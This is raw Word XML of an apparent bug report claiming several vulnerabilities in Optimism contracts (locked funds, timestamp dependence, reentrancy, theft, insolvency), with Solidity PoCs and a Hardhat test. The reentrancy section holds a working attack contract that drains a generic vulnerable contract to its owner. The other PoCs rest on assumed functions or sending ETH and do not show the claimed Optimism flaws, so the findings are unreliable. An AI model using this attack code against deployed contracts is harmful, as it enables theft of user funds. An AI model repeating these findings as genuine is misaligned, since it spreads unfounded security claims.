        </w:rPr>
        <w:t xml:space="preserve">A bug causes user funds to be permanently locked in the contract, with no way to recover them. This issue is caused by a failure in critical error handling and recovery mechanisms, which prevents users from accessing their funds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User funds could be permanently frozen, effectively causing a denial of service for all users of the contract.</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Proof of Concept (PoC):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:spacing w:after="240"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OptimismPortal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mapping(bytes32 =&gt; bool) public processedMessages;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lockFunds(bytes32 _messageHash) external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require(!processedMessages[_messageHash], "Message already processed");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processedMessages[_messageHash] = true;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Vulnerability: No recovery mechanism, funds could be locked indefinitely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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement recovery mechanisms and ensure that critical functions have proper error handling to prevent permanent lockup states.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 5: Timestamp Dependence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: Low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Contract: L2ToL2CrossDomainMessenger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This vulnerability arises because the contract relies on block.timestamp for non-critical operations. This could be exploited if a miner manipulates the timestamp to affect contract behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While this is not a critical issue, it could lead to minor inconsistencies in contract behavior under certain conditions.</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Proof of Concept (PoC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:spacing w:after="240"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L2ToL2CrossDomainMessenger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uint256 public messageNonce;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processMessage(bytes32 _messageHash) external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Vulnerability: Using block.timestamp for non-critical operations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require(block.timestamp &gt;= 1617817600, "Invalid timestamp");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6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider using more reliable time measurement mechanisms for time-sensitive operations.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bug Report: Reentrancy Vulnerability in Optimism Smart Contract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A reentrancy vulnerability was identified in an Optimism smart contract that allows an attacker to drain funds by repeatedly calling a vulnerable function before the contract updates its state. This could lead to a complete loss of user funds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">An attacker can withdraw more funds than they deposited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">If exploited, the contract could become insolvent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Affected users may lose all their funds.</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Affected Contract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:spacing w:after="240"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VulnerableContract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mapping(address =&gt; uint256) public balances;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deposit() external payable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balances[msg.sender] += msg.value;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withdraw() external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require(balances[msg.sender] &gt; 0, "No balance");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Reentrancy vulnerability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(bool success, ) = msg.sender.call{value: balances[msg.sender]}("");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require(success, "Transfer failed");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balances[msg.sender] = 0; // State update happens after external call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Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Attacker deposits funds into the contract.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Attacker calls withdraw using a malicious contract that calls withdraw again before the contract updates balances[msg.sender].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">3.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Funds are drained as the contract keeps sending ETH before updating the balance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept (PoC) – Hardhat Test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create an attack contract and test it using Hardhat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious Attack Contract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
      <w:pPr>
        <w:spacing w:after="240" w:befor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"./VulnerableContract.sol";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ReentrancyAttack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VulnerableContract public target;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address public owner;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constructor(address _target)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 = VulnerableContract(_target);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owner = msg.sender;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Start attack by depositing some ETH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attack() external payable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require(msg.value &gt; 0, "Need ETH to attack");</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target.deposit{value: msg.value}();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target.withdraw();</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Reentrancy exploit: keep calling withdraw</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receive() external payable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(address(target).balance &gt;= msg.value)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target.withdraw();</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payable(owner).transfer(address(this).balance); // Drain stolen funds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02">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hardhat Test Script (test/Reentrancy.js)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">
      <w:pPr>
        <w:spacing w:after="240" w:befor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 expect } = require("chai");</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 ethers } = require("hardhat");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describe("Reentrancy Attack", function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attacker, victim, owner;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vulnerableContract, attackContract;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beforeEach(async function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[owner, victim, attacker] = await ethers.getSigners();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Deploy the vulnerable contract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Vulnerable = await ethers.getContractFactory("VulnerableContract");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vulnerableContract = await Vulnerable.deploy();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vulnerableContract.deployed();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Deploy the attack contract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Attack = await ethers.getContractFactory("ReentrancyAttack");</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attackContract = await Attack.deploy(vulnerableContract.address);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attackContract.deployed();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Fund the vulnerable contract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owner.sendTransaction({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vulnerableContract.address,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 ethers.utils.parseEther("10"),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it("Should drain funds using reentrancy attack", async function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initialBalance = await ethers.provider.getBalance(attacker.address);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Attack by sending 1 ETH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attackContract.connect(attacker).attack({ value: ethers.utils.parseEther("1")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finalBalance = await ethers.provider.getBalance(attacker.address);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expect(finalBalance).to.be.gt(initialBalance); // Attacker gained ETH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29">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommended Fix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement reentrancy protection by using a Checks-Effects-Interactions pattern or ReentrancyGuard from OpenZeppelin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
      <w:pPr>
        <w:spacing w:after="240" w:befor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"@openzeppelin/contracts/security/ReentrancyGuard.sol";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FixedContract is ReentrancyGuard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mapping(address =&gt; uint256) public balances;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deposit() external payable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balances[msg.sender] += msg.value;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withdraw() external nonReentrant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uint256 amount = balances[msg.sender];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require(amount &gt; 0, "No balance");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balances[msg.sender] = 0; // Update state before external call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(bool success, ) = msg.sender.call{value: amount}("");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require(success, "Transfer failed");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           1.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Loss of user funds by direct theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Permanent freezing of funds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">3.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Protocol insolvency</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">4.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Incorrectly resolved dispute game</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the vulnerable contracts seem to be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">CrossL2Inbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">L1CrossDomainMessenger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">L1StandardBridge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">L2ToL1MessagePasser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">OptimismPortal</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC for Loss of User Funds by Direct Theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
      <w:pPr>
        <w:spacing w:after="240" w:befor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IL1StandardBridge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depositETHTo(address _to, uint256 _minGasLimit, bytes calldata _data) external payable;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Exploit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IL1StandardBridge public target;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constructor(address _target)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 = IL1StandardBridge(_target);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attack(address victim) external payable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Attacker forces victim to receive ETH without their consent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target.depositETHTo{value: msg.value}(victim, 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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC for Protocol Insolvency</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit assumes the contract fails to properly track liabilities, allowing attackers to drain liquidity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POS solidity contract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>
        <w:spacing w:after="240" w:befor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IL2ToL1MessagePasser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withdrawFunds(uint256 amount) external;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InsolvencyExploit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IL2ToL1MessagePasser public target;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constructor(address _target)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 = IL2ToL1MessagePasser(_target);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attack() external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Repeatedly withdraws funds without proper balance validation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(uint256 i = 0; i &lt; 10; i++)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target.withdrawFunds(100 ether);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80">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Outcome</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
